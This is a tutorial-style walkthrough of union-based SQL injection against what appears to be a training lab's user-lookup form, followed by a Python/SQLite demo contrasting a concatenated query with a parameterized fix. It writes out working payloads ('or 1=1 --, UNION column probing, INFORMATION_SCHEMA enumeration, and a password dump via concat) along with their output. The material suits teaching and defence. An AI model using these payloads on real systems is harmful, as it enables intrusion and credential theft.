1. Enter a single quote character ' in the text box to the left of submit. The following error is returned:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
From this we can infer that an injection vulnerability exists and that the backend database is MySQL.
2. Suppose the backend query is something like: select column from table where ID=? . Appending or 1=1 to the input and trying it still produces an error, the same one as above.
3. Perhaps commenting out the rest of the SQL statement can solve this problem, so try entering 'or 1=1 --; the result is shown in the figure below:
4. Next, use union to obtain more information. First enter 'union select 1,--; the result is shown in the figure below:
5. Then enter 'union select 1,2 --; the result is shown in the figure below:
6. Entering union select 1 -- and union select 1,2,3 -- both produce an error:
The used SELECT statements have a different number of columns
So we can guess that the table has two columns.
7. Next enter: 'union select 1, table_name from INFORMATION_SCHEMA.tables --; the result is:
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: CHARACTER_SETS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLLATIONS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLLATION_CHARACTER_SET_APPLICABILITY
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLUMNS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: COLUMN_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: ENGINES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: EVENTS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: FILES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: GLOBAL_STATUS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: GLOBAL_VARIABLES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: KEY_COLUMN_USAGE
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PARTITIONS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PLUGINS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PROCESSLIST
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: PROFILING
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: REFERENTIAL_CONSTRAINTS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: ROUTINES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SCHEMATA
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SCHEMA_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SESSION_STATUS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: SESSION_VARIABLES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: STATISTICS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLE_CONSTRAINTS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TABLE_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: TRIGGERS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: USER_PRIVILEGES
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: VIEWS
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: guestbook
ID: 'union select 1, table_name from INFORMATION_SCHEMA.tables -- '
First name: 1
Surname: users
8. The last two, guestbook and users, should be the tables we are after.
9. Enter: 'UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = 'users' -- '
The result, shown in the figure, lists all of the column names:
11. Enter 'union select NULL,password from users -- ' to retrieve the passwords; the result is shown in the figure below:
12. Finally, use the concat function to list the information from all columns:
'union select password,concat(first_name,' ',last_name,' ',user) from users -- '; the result is shown in the figure below:
OK, that's a wrap.
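To show why the two-column guess, the column-count error and the password dump above all work, and what closes the hole, here is an added example that is not part of the original walkthrough. It assumes the lab's backend query has the shape SELECT first_name, last_name FROM users WHERE user_id = '<input>' (an assumption consistent with the two-column result seen in step 6), uses an in-memory SQLite database with constructed rows instead of MySQL (so the error text differs), and runs each payload from the walkthrough against the string-concatenated query and its parameterized replacement.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table; the hashes are placeholders.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "placeholder-hash-1"),
    (2, "Gordon", "Brown", "gordonb", "placeholder-hash-2"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT,"
                 " last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    # Assumed shape of the lab's query: the input is pasted into the SQL text,
    # so a quote, UNION and -- inside it are parsed as SQL rather than as data.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    # The fix: the input is bound as a value, so it can only ever be compared
    # against user_id and never changes the statement's structure.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(conn, lookup, payload):
    # Returns ("rows", [...]) or ("error", message) so the two behaviours can be compared.
    try:
        return ("rows", lookup(conn, payload))
    except sqlite3.OperationalError as e:
        return ("error", str(e))


PAYLOADS = [
    "1",                                            # legitimate input
    "' or 1=1 -- ",                                 # step 3: whole table
    "' union select 1 -- ",                         # step 6: column-count error
    "' union select NULL,password from users -- ",  # step 11: password dump
]

if __name__ == "__main__":
    conn = make_db()
    for p in PAYLOADS:
        print(repr(p))
        print("  concatenated :", probe(conn, lookup_vulnerable, p))
        print("  parameterized:", probe(conn, lookup_parameterized, p))
```

The concatenated query returns every row for the or 1=1 payload, raises a column-count error for the one-column UNION (the SQLite equivalent of the MySQL message in step 6) and leaks the password column for the two-column UNION, while the parameterized query returns no rows for all three because no user_id equals that literal string.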